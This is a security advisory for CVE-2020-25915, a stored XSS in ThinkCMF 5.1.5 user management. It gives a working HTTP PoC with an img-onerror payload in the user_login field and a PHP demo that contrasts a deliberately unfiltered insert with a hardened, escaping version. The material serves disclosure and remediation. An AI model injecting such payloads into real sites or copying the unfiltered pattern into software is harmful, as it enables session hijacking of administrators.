CVE-2020-25915: There is a store Stored XSS vulnerability in user management · Issue #675 · thinkcmf/thinkcmf

Cross Site Scripting (XSS) vulnerability in UserController.php in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted user_login.


In vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php

the user management actions pass the raw $_POST array straight to the database, so no field of the request body is filtered or validated.

For example:

line 138:

$result = DB::name('user')->insertGetId($_POST);

line 221:

$result = DB::name('user')->update($_POST);

So any HTML sent in a field such as user_login is stored unmodified, and when it is later rendered in the user management pages it executes in the viewer's browser: a stored XSS in user management.

PoC (the request is sent with an administrator session, as the Cookie header shows, and carries the payload in the user_login parameter):

POST /admin/user/addpost.html HTTP/1.1
Host: test.net
Connection: close
Content-Length: 115
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://test.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://test.net/admin/user/add.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1

user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2
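Reduced to a standalone PHP script, the pattern above next to a hardened version. This is an added example written for this page, not ThinkCMF's own code: the in-memory SQLite table, its columns (including user_status), and the function names are assumptions, and the request body is constructed from the PoC.

```php
<?php
// Added example (not ThinkCMF code): the unfiltered-$_POST write behind
// CVE-2020-25915 reproduced without the framework, beside a hardened insert
// and an escaping renderer. Table, columns and names are assumptions.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE user (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    user_login TEXT NOT NULL,
    user_pass TEXT NOT NULL,
    user_email TEXT NOT NULL,
    user_status INTEGER NOT NULL DEFAULT 1
)');

// Constructed request body: the PoC payload in user_login, plus a column the
// add form never exposes, to show what an unfiltered write also accepts.
$post = [
    'user_login'  => "<img src='' onerror=alert(/xss/)>",
    'user_pass'   => '123456',
    'user_email'  => '1111@qqq.com',
    'role_id'     => ['2'],
    'user_status' => '0',   // assumed column; not part of the form
];

function tableColumns(PDO $db, string $table): array {
    $cols = [];
    foreach ($db->query("PRAGMA table_info($table)") as $row) {
        $cols[] = $row['name'];
    }
    return $cols;
}

// Column names come only from PRAGMA output or literals below, never from
// the client, so interpolating them into the SQL is safe; values are bound.
function insertRow(PDO $db, array $data): int {
    $cols = array_keys($data);
    $sql = sprintf('INSERT INTO user (%s) VALUES (%s)',
        implode(', ', $cols), implode(', ', array_fill(0, count($cols), '?')));
    $db->prepare($sql)->execute(array_values($data));
    return (int) $db->lastInsertId();
}

// Vulnerable: the equivalent of DB::name('user')->insertGetId($_POST).
// Every key that names a column is written exactly as sent, markup and all.
function insertUserRaw(PDO $db, array $post): int {
    $data = array_intersect_key($post, array_flip(tableColumns($db, 'user')));
    return insertRow($db, $data);
}

// Hardened: an explicit allow-list of the fields the form is meant to set,
// each validated. Restricting the login to a plain character set means the
// stored value can never carry HTML, whatever the templates later do.
function insertUserSafe(PDO $db, array $post): int {
    $login = (string) ($post['user_login'] ?? '');
    if (!preg_match('/^[A-Za-z0-9_]{3,32}$/', $login)) {
        throw new InvalidArgumentException('user_login must be 3-32 word characters');
    }
    $email = filter_var($post['user_email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        throw new InvalidArgumentException('user_email is not a valid address');
    }
    $pass = (string) ($post['user_pass'] ?? '');
    if (strlen($pass) < 6) {
        throw new InvalidArgumentException('user_pass is too short');
    }
    return insertRow($db, [
        'user_login' => $login,
        'user_email' => $email,
        'user_pass'  => password_hash($pass, PASSWORD_DEFAULT),
    ]);
}

// Output side: escape every column the user list renders, so a value stored
// before the input fix is still inert in the browser.
function renderUserRow(array $row): string {
    $e = fn (string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return sprintf("<tr><td>%s</td><td>%s</td></tr>\n", $e($row['user_login']), $e($row['user_email']));
}

$rawId = insertUserRaw($db, $post);
$row = $db->query("SELECT * FROM user WHERE id = $rawId")->fetch(PDO::FETCH_ASSOC);
echo "raw insert stored user_login={$row['user_login']} user_status={$row['user_status']}\n";
echo 'unescaped template would emit: <td>' . $row['user_login'] . "</td>\n";
echo 'escaped renderer emits:        ' . renderUserRow($row);

try {
    insertUserSafe($db, $post);
} catch (InvalidArgumentException $ex) {
    echo 'hardened insert rejected the PoC body: ' . $ex->getMessage() . "\n";
}
$okId = insertUserSafe($db, ['user_login' => 'alice', 'user_email' => 'alice@example.com', 'user_pass' => 'hunter22']);
echo "hardened insert accepted a normal user as id $okId\n";
```

The two halves are independent fixes: the allow-list and validation stop the payload (and any unexpected column) from being written, while escaping at render time protects rows that were stored before the input-side fix, so both belong in a patch.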

Related news

GHSA-4847-gqxx-v9xp: ThinkCMF Cross-site Scripting Vulnerability

Cross Site Scripting (XSS) vulnerability in `UserController.php` in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted `user_login`.
